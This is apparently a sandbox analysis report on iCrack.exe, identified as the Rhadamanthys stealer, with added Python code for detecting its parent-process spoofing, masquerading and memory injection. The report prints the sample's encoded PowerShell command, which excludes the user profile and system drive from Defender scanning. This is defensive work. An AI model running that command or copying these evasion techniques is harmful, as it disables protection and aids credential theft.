Analysis
-
max time kernel
117s
-
max time network
122s
-
platform
windows7_x64
-
resource
win7-20240221-en
-
resource tags
arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
-
submitted
05-04-2024 00:11
Static task
static1
Behavioral task
behavioral1
Sample
DrakeUI.Framework.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DrakeUI.Framework.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
config.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
config.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral6
Sample
iCrack.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
iCrack.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral8
Sample
launcher.dll
Resource
win10v2004-20240226-en
General
-
Target
iCrack.exe
-
Size
4.8MB
-
MD5
f3b1dd838a59c419431c5aa86c1a4feb
-
SHA1
85ac1eb8a03bedcfbc3d44cedeb802f5cae2ea0a
-
SHA256
fad83422bd338909393c57663ab1bcafb94ec684f74fdb95aaad925e82567fa3
-
SHA512
dbaac6b3c531cd84eac6a9440534d18cbc599826357b1efe36cdd16be163bd68c6ddd4d3211efca0d5e8c2ca6868cfb0fb3c3e0584c515b89e1ab1cac8ef6889
-
SSDEEP
98304:1vW7Ru1fkpfVmr/V9JfzD+p05u9qgo67Smy9BHbCMMjgml7/lg+QXcAz:JibHmTJfzAyQRoRmA1H8eFsA
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++, first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: svchost.exe
  description              pid   process      target process
  PID 1404 created 1336    1404  svchost.exe  Explorer.EXE
-
Executes dropped EXE 3 IoCs
Processes: svchost.exe, explorer.exe, explorer.exe
  pid   process
  1404  svchost.exe
  2528  explorer.exe
  2600  explorer.exe
-
Loads dropped DLL 5 IoCs
Processes: iCrack.exe, explorer.exe, explorer.exe
  pid   process
  1248  iCrack.exe
  1248  iCrack.exe
  1248  iCrack.exe
  2528  explorer.exe
  2600  explorer.exe
-
Processes:
  resource                                                                       yara_rule
  C:\Users\Admin\AppData\Local\Temp\_MEI25282\python310.dll                      upx
  behavioral6/memory/2600-35-0x000007FEF6560000-0x000007FEF69C6000-memory.dmp   upx
-
Detects Pyinstaller 1 IoCs
Processes:
  resource                               yara_rule
  \Users\Admin\AppData\Local\explorer.exe  pyinstaller
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes: svchost.exe, dialer.exe, powershell.exe
  pid   process
  1404  svchost.exe
  1404  svchost.exe
  2496  dialer.exe
  2496  dialer.exe
  2496  dialer.exe
  2496  dialer.exe
  2332  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
  description              pid   process
  Token: SeDebugPrivilege  2332  powershell.exe
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes: iCrack.exe, explorer.exe, svchost.exe
  description                        pid   process       target process
  PID 1248 wrote to memory of 2332   1248  iCrack.exe    powershell.exe
  PID 1248 wrote to memory of 2332   1248  iCrack.exe    powershell.exe
  PID 1248 wrote to memory of 2332   1248  iCrack.exe    powershell.exe
  PID 1248 wrote to memory of 2332   1248  iCrack.exe    powershell.exe
  PID 1248 wrote to memory of 1404   1248  iCrack.exe    svchost.exe
  PID 1248 wrote to memory of 1404   1248  iCrack.exe    svchost.exe
  PID 1248 wrote to memory of 1404   1248  iCrack.exe    svchost.exe
  PID 1248 wrote to memory of 1404   1248  iCrack.exe    svchost.exe
  PID 1248 wrote to memory of 2528   1248  iCrack.exe    explorer.exe
  PID 1248 wrote to memory of 2528   1248  iCrack.exe    explorer.exe
  PID 1248 wrote to memory of 2528   1248  iCrack.exe    explorer.exe
  PID 1248 wrote to memory of 2528   1248  iCrack.exe    explorer.exe
  PID 2528 wrote to memory of 2600   2528  explorer.exe  explorer.exe
  PID 2528 wrote to memory of 2600   2528  explorer.exe  explorer.exe
  PID 2528 wrote to memory of 2600   2528  explorer.exe  explorer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
  PID 1404 wrote to memory of 2496   1404  svchost.exe   dialer.exe
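The three signatures that matter most in this run are NtCreateUserProcessOtherParentProcess, Executes dropped EXE and the cross-process WriteProcessMemory rows. The following Python is an added example, not part of the Triage report, that turns those rows into the checks an analyst would run against EDR telemetry. The ProcessStart records are constructed from the report: the dropped svchost.exe (PID 1404) is the creator the signature row names, Explorer.EXE (PID 1336) is the parent of record, and dialer.exe (PID 2496) sits directly under Explorer.EXE in the process tree while only svchost.exe wrote into its memory, so the record for dialer.exe carries creator 1404 and parent 1336 (an inference from those rows, stated as such). The `parent_pid`/`creator_pid` field names and the idea that a sensor records both are the example's own assumption about what the telemetry source provides (for instance the ETW header ProcessId of a kernel process-start event versus the PPID in the event payload); they are not Triage's schema.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStart:
    pid: int
    image: str
    parent_pid: int   # parent as recorded in the new process (what the PEB / Sysmon EID 1 shows)
    creator_pid: int  # process that actually issued the create call (assumed sensor field)


# Constructed from the process tree and signature rows of the report above.
# Explorer.EXE (PID 1336) is the sandbox desktop shell and the root of the tree.
STARTS = [
    ProcessStart(1248, r"C:\Users\Admin\AppData\Local\Temp\iCrack.exe", 1336, 1336),
    ProcessStart(2332, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 1248, 1248),
    ProcessStart(1404, r"C:\Users\Admin\AppData\Roaming\svchost.exe", 1248, 1248),
    ProcessStart(2528, r"C:\Users\Admin\AppData\Local\explorer.exe", 1248, 1248),
    ProcessStart(2600, r"C:\Users\Admin\AppData\Local\explorer.exe", 2528, 2528),
    # dialer.exe is shown under Explorer.EXE in the tree, but the dropped svchost.exe (1404)
    # is the creator named by the NtCreateUserProcessOtherParentProcess row (inferred).
    ProcessStart(2496, r"C:\Windows\SysWOW64\dialer.exe", 1336, 1404),
]

# "wrote to memory of" rows from the report, deduplicated to (writer_pid, target_pid).
WRITES = [(1248, 2332), (1248, 1404), (1248, 2528), (2528, 2600), (1404, 2496)]

# Windows binary names this sample borrows; the genuine copies live under C:\Windows.
WINDOWS_BINARY_NAMES = {"svchost.exe", "explorer.exe", "dialer.exe", "powershell.exe"}
WINDOWS_DIR = "c:\\windows\\"


def spoofed_parents(starts):
    """PIDs whose recorded parent is not the process that created them (PPID spoofing)."""
    return [s.pid for s in starts if s.parent_pid != s.creator_pid]


def masquerading(starts):
    """PIDs running under a well-known Windows binary name from outside C:\\Windows."""
    hits = []
    for s in starts:
        path = s.image.lower()
        name = path.rsplit("\\", 1)[-1]
        if name in WINDOWS_BINARY_NAMES and not path.startswith(WINDOWS_DIR):
            hits.append(s.pid)
    return hits


def cross_process_writes(starts, writes):
    """Targets written to by something other than their recorded parent.

    A parent writing into its own child while it is being created is normal
    (that is what the iCrack.exe -> powershell.exe rows are); any other writer
    is injection, which is how svchost.exe reaches the signed dialer.exe.
    """
    parent_of = {s.pid: s.parent_pid for s in starts}
    return sorted({target for writer, target in writes if parent_of.get(target) != writer})


def render_tree(starts, root_pid=1336, root_image=r"C:\Windows\Explorer.EXE"):
    """Indented tree keyed on the creator, so the spoofed parent cannot hide dialer.exe."""
    children = {}
    for s in starts:
        children.setdefault(s.creator_pid, []).append(s)
    lines = []

    def walk(pid, image, depth):
        lines.append("  " * depth + f"{image} (PID {pid})")
        for child in sorted(children.get(pid, []), key=lambda s: s.pid):
            walk(child.pid, child.image, depth + 1)

    walk(root_pid, root_image, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_tree(STARTS))
    print("spoofed parent:", spoofed_parents(STARTS))
    print("masquerading:", masquerading(STARTS))
    print("cross-process writes:", cross_process_writes(STARTS, WRITES))
```

Keyed on the creator, the tree puts dialer.exe under the dropped svchost.exe rather than under Explorer.EXE, which is the view a detection should take: a parent-of-record that differs from the creator, plus memory writes from a third process, is the combination to alert on, not either fact alone.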
Processes
-
C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 1336

  C:\Users\Admin\AppData\Local\Temp\iCrack.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\iCrack.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1248

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2332

    C:\Users\Admin\AppData\Roaming\svchost.exe
      Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 1404

    C:\Users\Admin\AppData\Local\explorer.exe
      Command line: "C:\Users\Admin\AppData\Local\explorer.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 2528

      C:\Users\Admin\AppData\Local\explorer.exe
        Command line: "C:\Users\Admin\AppData\Local\explorer.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        PID: 2600

  C:\Windows\SysWOW64\dialer.exe
    Command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
    PID: 2496
-
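The PowerShell child of iCrack.exe in the tree above runs an -EncodedCommand (the executed image is the SysWOW64 copy even though the command line names System32, which is file-system redirection for a 32-bit parent). The following Python is an added example, not part of the Triage report: it decodes the argument (powershell.exe expects base64 of the UTF-16LE script text), strips the `<# ... #>` block comments the sample inserts between tokens so that a literal match on the cmdlet and its parameter fails, and flags the resulting Add-MpPreference call, which excludes the user profile and the whole system drive from Microsoft Defender scanning. The ENCODED constant is copied from the report; the cmdlet list, the tokenizer and the `analyze` result layout are the example's own and are adequate for one-liners like this one, not a general PowerShell parser (use the PowerShell AST, `[System.Management.Automation.Language.Parser]::ParseInput`, when you need that).

```python
import base64
import re

# The -EncodedCommand argument exactly as it appears in the process tree of the report.
ENCODED = "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
# A token is either an @( ... ) array literal or a run of non-whitespace.
TOKEN = re.compile(r"@\([^)]*\)|\S+")
# Cmdlets that change Defender configuration (example's own list, not exhaustive).
DEFENDER_CMDLETS = {"add-mppreference", "set-mppreference"}


def encode_command(script: str) -> str:
    """Build what powershell.exe -EncodedCommand expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Inverse of encode_command; returns the script text as PowerShell would see it."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments and normalise the whitespace they leave behind.

    The sample places junk comments such as <#vzf#> between tokens, so a string
    match on "Add-MpPreference -ExclusionPath" misses on the raw decoded script.
    """
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def parse_invocation(script: str):
    """Split a single-cmdlet script into (cmdlet, {param: value}); switches map to None."""
    tokens = TOKEN.findall(script)
    if not tokens:
        return "", {}
    cmdlet, params = tokens[0].lower(), {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            value = None
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                value = tokens[i + 1]
                i += 1
            params[tok.lower()] = value
        i += 1
    return cmdlet, params


def array_items(value: str):
    """Expand @(a,b) or a,b into a list of stripped items."""
    inner = value[2:-1] if value.startswith("@(") and value.endswith(")") else value
    return [item.strip().strip("'\"") for item in inner.split(",") if item.strip()]


def analyze(b64: str) -> dict:
    """Decode, deobfuscate and classify one -EncodedCommand value."""
    script = strip_block_comments(decode_encoded_command(b64))
    cmdlet, params = parse_invocation(script)
    exclusions = []
    for name, value in params.items():
        if name.startswith("-exclusion") and value is not None:
            exclusions.extend(array_items(value))
    # Adding exclusions or passing any -Disable* parameter to an Mp cmdlet is tampering.
    tamper = cmdlet in DEFENDER_CMDLETS and (
        bool(exclusions) or any(name.startswith("-disable") for name in params)
    )
    return {
        "script": script,
        "cmdlet": cmdlet,
        "params": params,
        "exclusions": exclusions,
        "defender_tamper": tamper,
    }


if __name__ == "__main__":
    import json
    print(decode_encoded_command(ENCODED))
    print(json.dumps(analyze(ENCODED), indent=2))
```

Two points for detection: decode before matching, because the junk comments defeat a pattern on the raw command line, and treat `$env:SystemDrive` as an exclusion of `C:\` rather than a path string, since that single entry turns Defender off for practically every file the stealer will touch afterwards.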
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
1.4MB
MD5
3f782cf7874b03c1d20ed90d370f4329
SHA1
08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256
2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512
950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
4.4MB
MD5
ce453607540a4b0e0c88476042d31791
SHA1
9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256
9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512
f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee
-
Filesize
355KB
MD5
2ef91bf37b3da8cad6751b665bd4e6af
SHA1
5c15bbc721f91855388861d378cf9d26a140cead
SHA256
5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512
16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3